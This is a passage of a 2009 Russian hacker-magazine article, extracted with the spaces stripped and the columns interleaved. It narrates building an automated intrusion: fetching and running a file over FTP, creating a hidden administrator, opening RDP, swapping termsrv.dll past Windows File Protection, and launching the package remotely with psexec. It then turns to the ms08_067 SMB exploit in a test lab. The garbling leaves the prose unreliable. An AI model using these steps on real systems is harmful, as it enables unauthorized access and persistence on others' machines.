Итак, всталазадачадобавленияпользова-	строиланонимныйвход, анаудаленнойтачке	ным, итолькоодинизпользователейможет
телявлокальнуюгруппуадминистраторов	впапке%temp% строказастрокойпрописал	оставатьсяактивным(вHome Edition, кстати,
посредствомполученнойконсоливусловиях	ftp-скриптдляподключениякмоемусерваку	терминальнойслужбывообщенет). Зачемэто
невозможностииспользоватьсимволыкирил-	иполученияфайла. Далеевконсолипоявился	сделано— большаязагадка, потомучтовряд
лицы. Пландействийтаков: пишемскрипт,	вызовftp.exe сключом-s, ифайлuser.exe ока-	ликто-тобудеттолькоиз-заэтогопокупать
реализующийнеобходимыйфункционал, ка-	залсянапредназначенномемуместе. После	сервернуюось, анеудобствдоставляетнеме-
ким-тообразомзаливаемегонаподопытную	запускавсистемепоявилсяпользовательс	ряно, особенновнашемслучае.
тачкуиисполняем. Скриптыяпредпочитаю	нужнымиправами.	Водномизбета-релизовXP такогоогра-
писатьнаAutoIT, такчтооткрываемSciTe из	Такимобразом, принципиальнопроблема	ничениянебыло, поэтомудляегоснятия
поставкиAutoIT иначинаемваять. Приэтом	решаетсянесложно. Впрочем, чемдальше,	достаточноподменитьбиблиотекуtermsrv.dll
хотелосьбысделатьверсиюскрипта, неза-	тембольшехочется. Вбиватькаждыйраз	иперезагрузиться. Насловахпросто, наделе
висящуюотлокали, — тоестьскриптдолжен	FTP’шныйскрипт, качатьизапускатьфайл	— нет. Всетиразличныхпатчеров, какгрязи,
уметьавтоматическиопределятьназвание	— идеологическикрайнедалекоотпостав-	новсеониработают, прямоскажем, хреново,
локальнойгруппыадминистраторов.	леннойзадачиавтосплойтинга. Крометого,	даито— толькоеслиихзапускатьизинтер-
Известно, чтосистемныегруппыввинде
имеютпредопределенныеSID, вчастности,
имеютпредопределенныеSID, вчастности,
SID группыадминистраторовимеетзначе-
ниеS-1-5-32-544. Дляполученияназва-
нияпоSID предоставляетсяAPI-функция
LookupAccountName, экспортируемаябибли-
отекойAdvAPI32.dll. ВавтоитмодульSecurity.
au3 предоставляетсоответствующуюфунк-
цию-обертку_Security__LookupAccountName.
Этойфункциеймыивоспользуемся(смотри
файлuser.au3 наDVD).

XÀÊÅÐ 08 /128/ 09

047

hang

NOW!

BUY

>>m

w Click

взлом

-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

XP УПОРНОСОПРОТИВЛЯЕТСЯЗАМЕНЕСИСТЕМНЫХФАЙЛОВ

HTTP://WWW

links

Присозданияавтосплойтанеобойтись безметасплойта: metasploit.org.

DVD

dvd

Надискетынайдешь:

•Исходныекоды скриптаfinal.au3.

•«Правильную» версиюбиблиотеки termsrv.dll.

•Конечныйбинарник ввидесамораспаковываемогоархива.

•Пропатченные исходникиметасплойта, атакжесами патчи.

активнойсессииииметьдоступкрабочемустолу. Делов том, чтосистемныеdll охраняютсясистемойWindows File Protection. Еслидоступенустановочныйдистрибутив(сCD илипосети), файлыбудутавтоматическизамененынаоригинальные. Еслинет, будетвыброшенопредупреждение онедоступностидискаипредложениевставитьдисклибо принятьновыйфайл. Ихотяназваниефайланепишется, надобытьполнымдауном, чтобыответить«Да», начтоя, естественно, полагатьсянебуду. Одинизметодовобхода заключаетсявнеобходимостизагрузкивбезопасном режиме, ноудаленно, ксожалению, этогонесделаешь. Поэтомувсепатчерыидутлесом, имыбудемваятьсобственный, которыйподменялбыбиблиотекуизнеинтерактивнойсессии, даиещекак-тосправлялсясзащитойфай- лов. Перваячастьтривиальна, авотсовторойсложнее. Надоотследитьпоявлениеокнаиэмулироватьнажатияна нужныекнопки. Положим, коддляэтогомынаписали, но, запустивегоизконсолиmetasploit, мыдикообломаемся, таккак, неимеядоступакрабочемустолу, окноон, естественно, непоймает, иникакиесигналыпослатьнесможет. Навыручку, какобычно, приходитпланировщикзадач, позволяющийзапускатьпрогивинтерактивномрежиме. Идеявтом, чтобыпоставитьзадачуэмуляциипользовательскихдействийнавыполнениевинтерактивномрежиме. Далее— дождатьсяеезапускаиужепотомподменять нужныефайлы. СмотринаDVD полныйкодскриптапод названиемfinal.au3, аятемвременемпоясню, чтокчему. Явесьфункционалзасунулводинфайл, поэтомусначала проверяю, скакимиаргументамизапущенбинарник. Если присутствуетключfsp, значит, будемждатьпоявленияокна ищелкатьпокнопкам. Определитьидентификационные данныеокнаикнопокможноспомощьюAu3Info изсборки AutoIT. Послеэтогояотправляюмашинувперезагрузку, дав юзеру2 минутынасохранениерезультатовработы.

Еслиключfsp незадан, скриптвыполняетсвоюосновнуюзадачу. Сначалаинициализируютсянеобходимые переменныеиосуществляетсяработапосозданиюнового администратора. Затемпроизводятсятелодвижения касательнореестраинетшелла, целькоторых— открытие доступакRDP. ДальшепроверяетсяверсияОСи, если онанеXP, работаскриптапрекращается. Еслижена узлеустановленаXP, спомощьюsc поднимаетсясервис планировщика, инавыполнениеставитсянашжескрипт,

носключомfsp. Подождав, покапланировщикзапустит задачу, скриптреализуетподменубиблиотеки. Дляэтого переименовываетсятекущаяdll (еслизапущенаслужба TermService, библиотекабудетзаблокирована, иудалить еенеполучится), ановаяdll копируетсяв%systemroot%\ system32\DLLCache (чтобыневозможнобыловосстановитьисходнуюверсиюизкэша), и, наконец, подменяется самабиблиотекав%systemroot%\system32.

Послесборкияупаковалсобранныйэкзешникибиблиотекувсамораспаковывающийсяархив. Архивнастроилна распаковкув%temp%, автоматическуюперезаписьвсех файлов(кстати, неперезаписывает— доказано), изапуск %temp%\final.exe поокончаниираспаковки. Хочешьпротестировать? Бериpsexec изапустиархивнаудаленной машине. ЧерезпримернотриминутыподключайсяпоRDP. Уменявсеполучилось, такчтодвигаемсядальше.

УЖАСНЫЙSMB

ПривсейсвоейпростотеиудобствеиспользованияSMB — жуткоглючнаяштука. Ктомуже, извсехтехнологий, реализованныхMicrosoft, этонаверное, однаизсамыхкорявых(не считаяосла). Тотжеметасплойтнесетвсебе14 сплойтовдля smb; незагорамииновыедырки. Нуамыпокавоспользуемсяms08_067, какнаиболеесвежейи, покаеще, достаточно пробивной. Проблемакроетсявбиблиотекеnetapi32.dll, а точнее, вфункцииwcscat (покрайнеймере, такееиспользовалconficker). Дляудаленногодоступаиспользуется

RPC-вызовсUUID 4b324fc8-1670-01d3-1278-5a47bf6ee188,

тоесть— обращениекинтерфейсуsrvsvc.

Чтобынемучитьпользователейлокалки, былорешено создатьтестовыйстенд. ЯнакатилобразвиндынаVmWare собновлениями, вышедшимидооктября2008 года(тогда появилсяпатч), немногоегоподстроиликлонировалв трехвариантах. Итак, полученалокальнаяминисеть, на которойможнооттачиватьмастерствоавтосплойта. Моимудивлениюидосаденебылопредела, когдапопытка применитьметасплойтовскийms08_067 окончилась неудачей! Тажеисторияпостиглаимилвормовский вариант, причемпоследнийвыплюнулошибку«Make SMB Connection error:53 (network path was not found)». Я

подумал, чтовиноватфайер, отключилегоипопробовал заново. Ситуациянемногоизменилась, нобыладалекаот идеала. Метасплойтнеправильноопределилсервиспак

048	XÀÊÅÐ 08 /128/ 09

<<< < Предыдущая 1 2 3 45 / 155 6 7 8 9 10 11 12 13 14 15 > Следующая >>>

Соседние файлы в папке журнал хакер

#
20.04.202422.66 Mб12123_Optimized.pdf
#
20.04.202414.76 Mб12124_Optimized.pdf
#
20.04.202411.92 Mб12125_Optimized.pdf
#
20.04.202412.83 Mб12126_Optimized.pdf
#
20.04.202416.73 Mб12127_Optimized.pdf
#
20.04.202416.61 Mб12128_Optimized.pdf
#
20.04.202415.04 Mб12129_Optimized.pdf
#
20.04.202417.96 Mб12130_Optimized.pdf
#
20.04.202417.2 Mб12131_Optimized.pdf
#
20.04.202410.05 Mб12132_Optimized.pdf
#
20.04.202415.19 Mб12133_Optimized.pdf